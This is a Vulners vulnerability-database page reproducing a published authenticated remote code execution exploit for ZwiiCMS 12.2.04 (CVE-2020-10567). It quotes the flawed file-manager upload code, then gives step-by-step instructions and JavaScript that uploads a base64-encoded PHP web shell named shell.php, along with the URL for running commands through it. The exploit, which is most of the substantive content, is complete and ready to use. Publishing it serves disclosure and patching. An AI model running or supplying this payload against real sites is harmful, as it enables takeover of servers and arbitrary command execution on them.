Vulners
Lucene search
ZwiiCMS 12.2.04 - Remote Code Execution (Authenticated)
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Exploit for Improper Input Validation in Tecrail Responsive_Filemanager | 26 Mar 202611:18 | – | githubexploit |
 | ZwiiCMS 12.2.04 Remote Code Execution Exploit | 7 Mar 202300:00 | – | zdt |
 | Tecrail Responsive FileManager Input Validation Error Vulnerability | 17 Mar 202000:00 | – | cnvd |
 | CVE-2020-10567 | 14 Mar 202000:00 | – | cve |
 | CVE-2020-10567 | 14 Mar 202000:00 | – | cvelist |
 | CVE-2020-10567 | 14 Mar 202014:15 | – | nvd |
 | ZwiiCMS 12.2.04 Remote Code Execution | 7 Mar 202300:00 | – | packetstorm |
 | Code injection | 14 Mar 202014:15 | – | prion |
 | PT-2020-3996 · Unknown · Responsive Filemanager | 14 Mar 202000:00 | – | ptsecurity |
 | CVE-2020-10567 | 22 May 202517:39 | – | redhatcve |
10
# Exploit Title: ZwiiCMS 12.2.04 Remote Code Execution (Authenticated)
# Date: 03/06/2023
# Exploit Author: Hadi Mene
# Vendor Homepage: https://zwiicms.fr/
# Version: 12.2.04 and potentially lower versions
# Tested on: Linux
# CVE: CVE-2020-10567
# Category: webapps
ZwiiCMS 12.2.04 uses "Responible FileManager" 9.14.0 for its file manager feature. ZwiiCMS is vulnerable to CVE-2020-10567 as it is possible for
an authenticated user to use ajax_calls.php to upload a php file via a base64 encoded file and gain Remote Code Execution
due to a lack of extension check on the uploaded file.
Original CVE author : hackoclipse
https://github.com/trippo/ResponsiveFilemanager/issues/600
Vulnerable code (ajax_calls.php) :
// there is no extension check on $_POST['name'] and the content of $_POST['url'] can be b64 decoded without being
necessarily an image
81 case 'save_img':
82 $info = pathinfo($_POST['name']);
83 $image_data = $_POST['url'];
84
85 if (preg_match('/^data:image\/(\w+);base64,/', $image_data, $type)) {
86 $image_data = substr($image_data, strpos($image_data, ',') + 1);
87 $type = strtolower($type[1]); // jpg, png, gif
88
89 $image_data = base64_decode($image_data);
PoC:
1) Login in the Administration Panel.
2) Click on the Folder icon on the top of the panel.
3) Open the Developer Tools for that page.
4) Copy,Edit and Execute the Javascript Code below .
5) Access your PHP shell at http://ZWIICMS_URL/site/file/source/shell.php?cmd=COMMAND
Javascript Code
######
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/192.168.0.27\/zwiicms\/core\/vendor\/filemanager\/ajax_calls.php?action=save_img", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9");
xhr.withCredentials = true;
var body = "url=data:image/jpeg;base64,PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==&path=&name=shell.php";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest();
######Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.10721